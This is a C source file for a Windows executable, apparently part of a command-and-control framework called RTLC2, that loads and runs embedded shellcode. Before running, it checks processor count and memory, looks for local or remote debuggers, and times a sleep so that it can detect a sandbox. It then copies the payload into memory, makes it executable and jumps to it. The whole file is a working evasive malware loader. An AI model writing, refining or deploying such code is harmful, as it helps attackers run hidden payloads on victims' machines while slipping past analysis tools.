/* =========================================================================
 * RTLC2 Shellcode Loader - Windows EXE
 * Standalone binary that loads and executes embedded shellcode with evasion
 * ========================================================================= */

#include <windows.h>
#include <winternl.h>

/* Shellcode data - generated by build script */
#include "shellcode_data.h"

/* ---- Evasion: Hardware checks ---- */
static int CheckHardware(void) {
    SYSTEM_INFO si;
    GetSystemInfo(&si);
    if (si.dwNumberOfProcessors < 2) return 0;

    MEMORYSTATUSEX ms;
    ms.dwLength = sizeof(ms);
    GlobalMemoryStatusEx(&ms);
    if (ms.ullTotalPhys < (DWORDLONG)2 * 1024 * 1024 * 1024) return 0;

    return 1;
}

/* ---- Evasion: Debugger check ---- */
static int CheckDebugger(void) {
    if (IsDebuggerPresent()) return 0;
    BOOL remoteDbg = FALSE;
    CheckRemoteDebuggerPresent(GetCurrentProcess(), &remoteDbg);
    if (remoteDbg) return 0;
    return 1;
}

/* ---- Evasion: Timing check (fast-forward detection) ---- */
static int CheckTiming(void) {
    DWORD t1 = GetTickCount();
    HANDLE hEvent = CreateEventA(NULL, TRUE, FALSE, NULL);
    if (hEvent) {
        WaitForSingleObject(hEvent, 1500);
        CloseHandle(hEvent);
    }
    DWORD elapsed = GetTickCount() - t1;
    if (elapsed < 1000) return 0; /* Sandbox fast-forwarded sleep */
    return 1;
}

/* ---- Main ---- */
int main(void) {
    /* Evasion checks */
    if (!CheckHardware()) return 0;
    if (!CheckDebugger()) return 0;
    if (!CheckTiming())   return 0;

    /* Allocate RW memory */
    void *mem = VirtualAlloc(NULL, shellcode_len,
                             MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
    if (!mem) return 1;

    /* Copy shellcode */
    memcpy(mem, shellcode, shellcode_len);

    /* Change to RX */
    DWORD oldProt;
    VirtualProtect(mem, shellcode_len, PAGE_EXECUTE_READ, &oldProt);

    /* Execute */
    ((void (*)(void))mem)();

    /* Cleanup (unreachable if shellcode takes over) */
    VirtualFree(mem, 0, MEM_RELEASE);
    return 0;
}
